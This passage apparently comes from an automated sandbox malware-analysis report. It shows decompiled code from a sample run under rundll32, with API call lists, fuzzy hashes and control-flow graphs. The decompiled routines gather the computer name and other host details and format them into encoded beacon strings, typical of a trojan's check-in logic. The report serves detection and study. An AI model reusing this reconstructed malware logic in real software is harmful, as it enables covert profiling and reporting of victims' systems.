                                          						_t31 = 8;
                                          						L7:
                                          						if(_t31 != 0) {
                                          							L10:
                                          							 *0x4c0d24c =  *0x4c0d24c + 1;
                                          							L11:
                                          							return _t31;
                                          						}
                                          						_t46 = _a4;
                                          						_t41 = _v8;
                                          						 *_a16 = _a4;
                                          						 *_a20 = E04C07CF7(_a4, _t41);
                                          						_t19 = E04C060CF(_t41, _t41, _t46);
                                          						if(_t19 != 0) {
                                          							 *_a8 = _t41;
                                          							 *_a12 = _t19;
                                          							if( *0x4c0d24c < 5) {
                                          								 *0x4c0d24c =  *0x4c0d24c & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t31 = 0xbf;
                                          						E04C06106();
                                          						HeapFree( *0x4c0d238, 0, _t41);
                                          						goto L10;
                                          					}
                                          					_t25 = E04C0514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                          					L5:
                                          					_t31 = _t25;
                                          					goto L7;
                                          				}
                                          				if(RtlAllocateHeap() == 0) {
                                          					goto L6;
                                          				}
                                          				_t25 = E04C01754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                          				goto L5;
                                          			}













                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04C09F3B
                                            • Part of subcall function 04C01754: GetTickCount.KERNEL32 ref: 04C01768
                                            • Part of subcall function 04C01754: wsprintfA.USER32 ref: 04C017B8
                                            • Part of subcall function 04C01754: wsprintfA.USER32 ref: 04C017D5
                                            • Part of subcall function 04C01754: wsprintfA.USER32 ref: 04C01801
                                            • Part of subcall function 04C01754: HeapFree.KERNEL32(00000000,?), ref: 04C01813
                                            • Part of subcall function 04C01754: wsprintfA.USER32 ref: 04C01834
                                            • Part of subcall function 04C01754: HeapFree.KERNEL32(00000000,?), ref: 04C01844
                                            • Part of subcall function 04C01754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C01872
                                            • Part of subcall function 04C01754: GetTickCount.KERNEL32 ref: 04C01883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04C09F59
                                          • HeapFree.KERNEL32(00000000,?,?,?,04C09C62,00000002,?,?,?,?), ref: 04C09FB6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 32b509ebdfa6ac673f7c939685f0942581916c68518138407bb743231cb11cea
                                          • Instruction ID: 5f67122fdb717929984799d0203b358978f43215a06cd03e20a7e820b026daab
                                          • Opcode Fuzzy Hash: 32b509ebdfa6ac673f7c939685f0942581916c68518138407bb743231cb11cea
                                          • Instruction Fuzzy Hash: 6E217FB9201205EBEB15DFA9D840BAA77ADEB48348F118015F90297281DB74FE85DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 399 4c0642c-4c06452 401 4c06520-4c06526 399->401 402 4c06458-4c0646c call 4c04ffa 399->402 404 4c06471-4c06475 402->404 405 4c06517-4c0651c 404->405 406 4c0647b-4c06480 404->406 405->401 407 4c06482-4c06485 406->407 408 4c06498-4c0649a 406->408 407->408 409 4c06487-4c06496 407->409 408->405 410 4c0649c-4c064c2 408->410 409->408 413 4c064f0-4c064f5 410->413 414 4c064c4-4c064d0 call 4c05103 410->414 416 4c064f7-4c064f9 413->416 417 4c064fd-4c06506 413->417 414->413 421 4c064d2-4c064d7 414->421 416->417 419 4c06508-4c0650b SysFreeString 417->419 420 4c0650d-4c06510 417->420 419->420 420->405 422 4c06512-4c06515 SysFreeString 420->422 421->413 423 4c064d9-4c064dc 421->423 422->405 423->413 424 4c064de-4c064ee 423->424 424->413
                                          C-Code - Quality: 75%
                                          			E04C0642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				void* _v8;
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				_t40 = E04C04FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                          						_t52 = _v8;
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0x4c0d2a4; // 0x97a5a8
                                          						_t20 = _t68 + 0x4c0e1fc; // 0x740053
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E04C05103(_a4);
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                          									_t50 = _a4;
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                          						}
                                          						_t57 = __imp__#6;
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                          				goto L18;
                                          			}






















                                          APIs
                                            • Part of subcall function 04C04FFA: SysAllocString.OLEAUT32(80000002), ref: 04C05057
                                            • Part of subcall function 04C04FFA: SysFreeString.OLEAUT32(00000000), ref: 04C050BD
                                          • SysFreeString.OLEAUT32(?), ref: 04C0650B
                                          • SysFreeString.OLEAUT32(04C0A6F4), ref: 04C06515
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 0e48a698df84a9c4ed80c51ffbb76e9487307b3f29f9e1d17551baf83bfe133d
                                          • Instruction ID: 1e59af532f394006810a758c38c5cedebbb99b4bd68c106d02f2e2646dbab2a1
                                          • Opcode Fuzzy Hash: 0e48a698df84a9c4ed80c51ffbb76e9487307b3f29f9e1d17551baf83bfe133d
                                          • Instruction Fuzzy Hash: 01317C75600159AFCB11DFA8C888C9FBB7AFFC97447118658F8069B254E331EDA1DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E04C073E9(void* __ecx) {
                                          				signed int _v8;
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E04C058BE(_t10 + 1);
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;
                                          						} else {
                                          							E04C0147E(_t20);
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}










                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04C051DC,7519F710,00000000,?,?,04C051DC), ref: 04C07401
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04C051DC,04C051DD,?,?,04C051DC), ref: 04C0741E
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 05a7f8ec9cdda4d77c457cc04119ce3cfed95786696f0489dba60a7b670688eb
                                          • Instruction ID: 39d2365451b2368ed53c428095ed8bee22d9d85832e3c150ab7b261afd286a3b
                                          • Opcode Fuzzy Hash: 05a7f8ec9cdda4d77c457cc04119ce3cfed95786696f0489dba60a7b670688eb
                                          • Instruction Fuzzy Hash: 74F0B436A01109BAEB10DAFA8C00EAF7ABEDBC4640F254059A904D3180EA74FF019AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E04C07BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t4 = _t15 + 0x4c0e39c; // 0x5588944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0x4c0e124; // 0x650047
                                          				_t17 = E04C0642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E04C04CD3(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}











                                          APIs
                                            • Part of subcall function 04C0642C: SysFreeString.OLEAUT32(?), ref: 04C0650B
                                            • Part of subcall function 04C04CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04C0358E,004F0053,00000000,?), ref: 04C04CDC
                                            • Part of subcall function 04C04CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04C0358E,004F0053,00000000,?), ref: 04C04D06
                                            • Part of subcall function 04C04CD3: memset.NTDLL ref: 04C04D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C07C0C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: cf2a94526052d94d4b180c7811de477eeba6c9fabd3a0e846d8fb58660aec4c8
                                          • Instruction ID: 07b3ca57f1fbf9cd9e695fc420c0d3fa9a5da85b8ed007937d59a129ac7e3b6b
                                          • Opcode Fuzzy Hash: cf2a94526052d94d4b180c7811de477eeba6c9fabd3a0e846d8fb58660aec4c8
                                          • Instruction Fuzzy Hash: 5E01B13150001ABFDB059FA8CD00AABBBBAEB04604F018525EA05E70A1E371FE62D7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E04C09347(void* __ecx, signed char* _a4) {
                                          				void* _v8;
                                          				void* _t8;
                                          				signed short _t11;
                                          				signed int _t12;
                                          				signed int _t14;
                                          				intOrPtr _t15;
                                          				void* _t19;
                                          				signed short* _t22;
                                          				void* _t24;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = 0;
                                          				_push(0);
                                          				_t19 = 1;
                                          				_t27 = 0x4c0d330;
                                          				E04C0684E();
                                          				while(1) {
                                          					_t8 = E04C032BA(_a4,  &_v8); // executed
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_push(_v8);
                                          					_t14 = 0xd;
                                          					_t15 = E04C0A5E9(_t14);
                                          					if(_t15 == 0) {
                                          						HeapFree( *0x4c0d238, 0, _v8);
                                          						break;
                                          					} else {
                                          						 *_t27 = _t15;
                                          						_t27 = _t27 + 4;
                                          						_t24 = _t24 + 1;
                                          						if(_t24 < 3) {
                                          							continue;
                                          						} else {
                                          						}
                                          					}
                                          					L7:
                                          					_push(1);
                                          					E04C0684E();
                                          					if(_t19 != 0) {
                                          						_t22 =  *0x4c0d338; // 0x5589b58
                                          						_t11 =  *_t22 & 0x0000ffff;
                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                          							_t12 = _t11 & 0x0000ffff;
                                          						} else {
                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                          						}
                                          						 *_t22 = _t12;
                                          					}
                                          					return _t19;
                                          				}
                                          				_t19 = 0;
                                          				goto L7;
                                          			}














                                          APIs
                                            • Part of subcall function 04C0684E: GetProcAddress.KERNEL32(36776F57,04C0935F), ref: 04C06869
                                            • Part of subcall function 04C032BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04C032E5
                                            • Part of subcall function 04C032BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04C03307
                                            • Part of subcall function 04C032BA: memset.NTDLL ref: 04C03321
                                            • Part of subcall function 04C032BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04C0335F
                                            • Part of subcall function 04C032BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04C03373
                                            • Part of subcall function 04C032BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 04C0338A
                                            • Part of subcall function 04C032BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04C03396
                                            • Part of subcall function 04C032BA: lstrcat.KERNEL32(?,642E2A5C), ref: 04C033D7
                                            • Part of subcall function 04C032BA: FindFirstFileA.KERNEL32(?,?), ref: 04C033ED
                                            • Part of subcall function 04C0A5E9: lstrlen.KERNEL32(?,00000000,04C0D330,00000001,04C0937A,04C0D00C,04C0D00C,00000000,00000005,00000000,00000000,?,?,?,04C0207E,?), ref: 04C0A5F2
                                            • Part of subcall function 04C0A5E9: mbstowcs.NTDLL ref: 04C0A619
                                            • Part of subcall function 04C0A5E9: memset.NTDLL ref: 04C0A62B
                                          • HeapFree.KERNEL32(00000000,04C0D00C,04C0D00C,04C0D00C,00000000,00000005,00000000,00000000,?,?,?,04C0207E,?,04C0D00C,?,?), ref: 04C09396
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: b51caf0b7fbdff1b3882f817cb4a7718cd55997cd44d24eb47ad8e9eebbb9562
                                          • Instruction ID: 861c95b595eb40626fb2adbbc5aa7b7a558deb6f93cb8606aab5b96608ad78da
                                          • Opcode Fuzzy Hash: b51caf0b7fbdff1b3882f817cb4a7718cd55997cd44d24eb47ad8e9eebbb9562
                                          • Instruction Fuzzy Hash: 34014CF5304205AAF7105FE7CD80B7AB6ABEB44368F059035F945C60E1D674FD81AB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04C01B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				void* _t15;
                                          				void* _t21;
                                          				signed int _t23;
                                          				void* _t26;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 = E04C07BA9(_a4, _a8, _a12, __edi); // executed
                                          					_t26 = _t15;
                                          				} else {
                                          					_t26 = E04C074B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                          					if(_t26 == 0) {
                                          						_t23 = _a8 >> 1;
                                          						if(_t23 == 0) {
                                          							_t26 = 2;
                                          							HeapFree( *0x4c0d238, 0, _a12);
                                          						} else {
                                          							_t21 = _a12;
                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                          							 *__edi = _t21;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}








                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04C0690C,?,004F0053,05589388,00000000,?), ref: 04C01B60
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7f91ac2687f3432af4f0a8639288174b3c06fc499668fbad06e36d67637af260
                                          • Instruction ID: 9c235ea879b8b2435c6a00224d42860fe9ee1593b4d2508fe8c1fd7343617c03
                                          • Opcode Fuzzy Hash: 7f91ac2687f3432af4f0a8639288174b3c06fc499668fbad06e36d67637af260
                                          • Instruction Fuzzy Hash: 2F018672100209FBDF21DF95DC01FAA7B6AFF04760F0DC015FA199A1A0E731AA60DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 66%
                                          			E04C0514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v48;
                                          				intOrPtr _v56;
                                          				void* __edi;
                                          				long _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				int _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				intOrPtr _t51;
                                          				intOrPtr _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t71;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				int _t80;
                                          				intOrPtr _t81;
                                          				int _t84;
                                          				intOrPtr _t86;
                                          				int _t89;
                                          				intOrPtr* _t92;
                                          				intOrPtr* _t93;
                                          				void* _t94;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				intOrPtr _t101;
                                          				void* _t103;
                                          				int _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t109;
                                          				void* _t111;
                                          
                                          				_t98 = __edx;
                                          				_t94 = __ecx;
                                          				_t26 = __eax;
                                          				_t108 = _a16;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t26 = GetTickCount();
                                          				}
                                          				_t27 =  *0x4c0d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t28 =  *0x4c0d014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t29 =  *0x4c0d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t30 =  *0x4c0d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t31 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t3 = _t31 + 0x4c0e633; // 0x74666f73
                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x4c0d02c,  *0x4c0d004, _t26);
                                          				_t34 = E04C057AB();
                                          				_t35 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t4 = _t35 + 0x4c0e673; // 0x74707526
                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                          				_t111 = _t109 + 0x38;
                                          				_t105 = _t104 + _t38;
                                          				_t99 = E04C073E9(_t94);
                                          				if(_t99 != 0) {
                                          					_t86 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t6 = _t86 + 0x4c0e8cb; // 0x736e6426
                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t89;
                                          					HeapFree( *0x4c0d238, 0, _t99);
                                          				}
                                          				_t100 = E04C0614A();
                                          				if(_t100 != 0) {
                                          					_t81 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t8 = _t81 + 0x4c0e8d3; // 0x6f687726
                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t84;
                                          					HeapFree( *0x4c0d238, 0, _t100);
                                          				}
                                          				_t101 =  *0x4c0d324; // 0x55895b0
                                          				_a32 = E04C0757B(0x4c0d00a, _t101 + 4);
                                          				_t43 =  *0x4c0d2cc; // 0x0
                                          				if(_t43 != 0) {
                                          					_t77 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t11 = _t77 + 0x4c0e8ad; // 0x3d736f26
                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t80;
                                          				}
                                          				_t44 =  *0x4c0d2c8; // 0x0
                                          				if(_t44 != 0) {
                                          					_t74 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t13 = _t74 + 0x4c0e8a6; // 0x3d706926
                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                          				}
                                          				if(_a32 != 0) {
                                          					_t103 = RtlAllocateHeap( *0x4c0d238, 0, 0x800);
                                          					if(_t103 != 0) {
                                          						E04C0749F(GetTickCount());
                                          						_t51 =  *0x4c0d324; // 0x55895b0
                                          						__imp__(_t51 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t55 =  *0x4c0d324; // 0x55895b0
                                          						__imp__(_t55 + 0x40);
                                          						_t57 =  *0x4c0d324; // 0x55895b0
                                          						_t106 = E04C04D2C(1, _t98, _t108,  *_t57);
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t106 != 0) {
                                          							StrTrimA(_t106, 0x4c0c294);
                                          							_t63 =  *0x4c0d2a4; // 0x97a5a8
                                          							_push(_t106);
                                          							_t15 = _t63 + 0x4c0e252; // 0x616d692f
                                          							_t65 = E04C09DEF(_t15);
                                          							_v20 = _t65;
                                          							if(_t65 != 0) {
                                          								_t92 = __imp__;
                                          								 *_t92(_t106, _v4);
                                          								 *_t92(_t103, _v0);
                                          								_t93 = __imp__;
                                          								 *_t93(_t103, _v32);
                                          								 *_t93(_t103, _t106);
                                          								_t71 = E04C0666E(0xffffffffffffffff, _t103, _v32, _v28);
                                          								_v56 = _t71;
                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                          									E04C06106();
                                          								}
                                          								HeapFree( *0x4c0d238, 0, _v48);
                                          							}
                                          							HeapFree( *0x4c0d238, 0, _t106);
                                          						}
                                          						HeapFree( *0x4c0d238, 0, _t103);
                                          					}
                                          					HeapFree( *0x4c0d238, 0, _a24);
                                          				}
                                          				HeapFree( *0x4c0d238, 0, _t108);
                                          				return _a12;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04C05166
                                          • wsprintfA.USER32 ref: 04C051B3
                                          • wsprintfA.USER32 ref: 04C051D0
                                          • wsprintfA.USER32 ref: 04C051F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C05203
                                          • wsprintfA.USER32 ref: 04C05225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C05235
                                          • wsprintfA.USER32 ref: 04C0526C
                                          • wsprintfA.USER32 ref: 04C0528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C052A9
                                          • GetTickCount.KERNEL32 ref: 04C052B9
                                          • RtlEnterCriticalSection.NTDLL(05589570), ref: 04C052CD
                                          • RtlLeaveCriticalSection.NTDLL(05589570), ref: 04C052EB
                                            • Part of subcall function 04C04D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04C052FE,?,055895B0), ref: 04C04D57
                                            • Part of subcall function 04C04D2C: lstrlen.KERNEL32(?,?,?,04C052FE,?,055895B0), ref: 04C04D5F
                                            • Part of subcall function 04C04D2C: strcpy.NTDLL ref: 04C04D76
                                            • Part of subcall function 04C04D2C: lstrcat.KERNEL32(00000000,?), ref: 04C04D81
                                            • Part of subcall function 04C04D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C052FE,?,055895B0), ref: 04C04D9E
                                          • StrTrimA.SHLWAPI(00000000,04C0C294,?,055895B0), ref: 04C0531D
                                            • Part of subcall function 04C09DEF: lstrlen.KERNEL32(?,00000000,00000000,04C05335,616D692F,00000000), ref: 04C09DFB
                                            • Part of subcall function 04C09DEF: lstrlen.KERNEL32(?), ref: 04C09E03
                                            • Part of subcall function 04C09DEF: lstrcpy.KERNEL32(00000000,?), ref: 04C09E1A
                                            • Part of subcall function 04C09DEF: lstrcat.KERNEL32(00000000,?), ref: 04C09E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C05348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C0534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 04C0535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04C05360
                                            • Part of subcall function 04C0666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04C06720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04C05390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04C0539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,055895B0), ref: 04C053AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C053C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C053CF
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
